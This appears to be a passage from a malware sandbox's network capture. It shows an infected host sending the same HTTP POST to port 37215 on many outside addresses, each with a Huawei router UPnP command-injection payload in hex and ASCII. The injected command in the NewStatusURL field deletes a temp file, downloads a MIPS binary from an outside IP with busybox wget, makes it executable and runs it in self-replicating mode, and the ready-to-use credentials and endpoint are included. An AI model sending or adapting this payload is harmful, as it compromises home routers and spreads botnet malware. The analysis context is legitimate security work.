                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        107192.168.2.235169841.141.44.16337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.292646885 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        108192.168.2.235907441.27.41.037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.292654991 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        109192.168.2.2346134157.54.56.18337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.292664051 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        110192.168.2.2344158128.226.231.10037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.292690039 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        111192.168.2.2351088109.155.237.21337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.292767048 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        112192.168.2.235200841.215.165.7537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.292778015 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        113192.168.2.233528427.225.250.17637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.292805910 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        114192.168.2.234238239.151.86.15937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.292813063 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        115192.168.2.2356698157.3.167.4937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.293060064 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        116192.168.2.2336430208.209.41.18137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.293093920 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
